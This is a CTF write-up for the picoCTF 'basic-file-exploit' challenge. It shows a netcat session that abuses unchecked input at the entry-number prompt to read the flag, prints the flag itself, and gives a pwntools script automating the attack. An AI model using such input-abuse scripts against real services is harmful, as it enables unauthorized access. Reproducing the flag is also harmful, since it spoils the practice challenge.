basic-file-exploit
Description
The program provided allows you to write to a file and read what you wrote from it. Try playing around with it and see if you can break it!
Connect to the program with netcat:
$ nc saturn.picoctf.net 49698The program's source code with the flag redacted can be downloaded here.
Solving
- Netcat into the service via given connectionstring
- Add a new entry
- After adding the new entry, we can use option 2 to read the file from the "database"
- Here we try to readout the flag instead of the number.
- It does not matter, which string we are using!
nc saturn.picoctf.net 49698
Hi, welcome to my echo chamber!
Type '1' to enter a phrase into our database
Type '2' to echo a phrase in our database
Type '3' to exit the program
1
1
Please enter your data:
Test
Test
Please enter the length of your data:
4
4
Your entry number is: 1
Write successful, would you like to do anything else?
2
2
Please enter the entry number of your data:
flag
flag
picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_00AAD6B3}Script
Because I like to automate these things, I wrote a solve.py for that. This will get the flag for you!
Feel free to use it.
#!/usr/bin/env python
from pwn import *
host,port = 'saturn.picoctf.net', 49698
try:
s = remote(host, port)
print("...walking through the program... please wait!")
s.recvuntil(b'to exit the program')
s.sendline(b'1')
s.recvuntil(b'Please enter your data:')
s.sendline(b'Entry')
s.recvuntil(b'Please enter the length of your data:')
s.sendline(b'5')
s.recvuntil(b'else?')
s.sendline(b'2')
s.recvuntil(b'data:')
s.sendline(b'flag')
print("receiving flag!")
s.recv()
s.recv()
flag = s.recv().decode('utf-8')
print("Flag: " + str(flag).strip())
print("Done!")
except:
print("Could not connect.")
s.close